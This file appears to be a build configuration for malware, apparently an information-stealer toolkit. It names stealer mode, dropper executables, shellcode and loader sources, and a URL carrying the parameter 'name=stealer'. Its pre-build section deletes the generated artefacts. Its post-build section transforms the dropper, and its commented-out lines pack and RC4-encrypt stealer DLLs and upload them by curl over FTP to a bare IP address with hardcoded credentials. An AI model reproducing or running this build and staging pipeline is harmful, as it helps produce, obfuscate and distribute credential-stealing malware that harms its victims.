[main]
urls_param = "--user user:pwd"
urls_link = "http://2.3.4.5:8888/?name=stealer&buildid=7777777&period=12h&count=2&min=7&max=24&alignby=d"
urls_file = "urls.in"
urls_proto = "http://"
urls_domain = ".domain.com"
urls_uri = ""

[pre]
command = "cmd.exe /C "DEL /F /Q urls.in""
command = "cmd.exe /C "DEL /F /Q code\config_data.h""
command = "cmd.exe /C "DEL /F /Q code\dllmem_sc_x32.c""
command = "cmd.exe /C "DEL /F /Q code\dllmem_sc_x64.c""
command = "cmd.exe /C "DEL /F /Q code\explorer_sc_x32.c""
command = "cmd.exe /C "DEL /F /Q code\explorer_sc_x64.c""
command = "cmd.exe /C "DEL /F /Q code\std_sc_x32.c""
command = "cmd.exe /C "DEL /F /Q code\std_sc_x64.c""
command = "cmd.exe /C "DEL /F /Q code\zk_loader_x32.c""
command = "cmd.exe /C "DEL /F /Q code\zk_loader_x64.c""
command = "cmd.exe /C "DEL /F /Q autobuild\dropper.exe""
command = "cmd.exe /C "DEL /F /Q autobuild\dropper64.exe""
command = "cmd.exe /C "DEL /F /Q autobuild\dropper.zm""
command = "cmd.exe /C "DEL /F /Q autobuild\dropper64.zm""


[build]
params = "/stealer_mode"

[post]
command = "ztransform.exe -i="autobuild\dropper.exe" -o="autobuild\dropper.zm""
; command = "lzma_packer.exe -i="autobuild\stealer32.dll" -o="autobuild\abcd.temp""
; command = "rc4_crypter.exe -i="autobuild\abcd.temp" -o="autobuild\abcd.z""
; command = "lzma_packer.exe -i="autobuild\stealer64.dll" -o="autobuild\abcq.temp""
; command = "rc4_crypter.exe -i="autobuild\abcq.temp" -o="autobuild\abcq.z""
; command = "curl.exe -T autobuild\abcd.z -u zb0t:UIF4oOcfo8ei393eo1RweIeoelc48k4Y9o4Z5klARL2fd8d ftp://1.2.3.4/"
; command = "curl.exe -T autobuild\abcq.z -u zb0t:UIF4oOcfo8ei393eo1RweIeoelc48k4Y9o4Z5klARL2fd8d ftp://1.2.3.4/"